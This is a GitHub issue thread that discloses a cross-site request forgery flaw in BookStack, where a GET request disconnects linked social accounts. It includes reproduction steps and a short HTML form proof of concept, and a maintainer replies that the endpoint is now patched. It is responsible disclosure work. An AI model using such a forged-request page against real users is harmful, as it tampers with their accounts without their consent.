### ISSUE TITLE
Cross Site Request Forgery To Disconnect Social Accounts

### ISSUE THREAD

**Issue by bishal0x01** [BookStackApp/BookStack#2808]
Hello team,

I noticed that in "Disconnect Social Accounts" parameter request is going in the HTTP GET method and did not generating CSRF token.

Steps to reproduce:-
1. Login your BookStack account as https://bookstack.yoururl.com
2. Now navigate to the "Edit profile" or go to the https://bookstack.yoururl.com/user/{id} 
3. Then click on https://bookstack.yoururl.com/login/service/google/detach or save the following code as csrf.html and sent it to ther another user.
```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://bookstack.yoururl.com/login/service/google/detach">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
4. As you can see Social Accounts i.e  google has been disconnect. 

Impact: By sedning link it is possible to disconnect the user's Social Accounts.

Mitigation: Request should be send in POST or should be generate CSRF token.

If you need information please let me know.

Best regards,
Bishal

**Comment by ssddanbrown** [comment]
Thanks @bishal0x01,
Not a major concern for this endpoint but probably should be a POST with CSRF as stated.
Now patched in 7d951b842c762999e009e8ab330832788869566e for the next patch release.
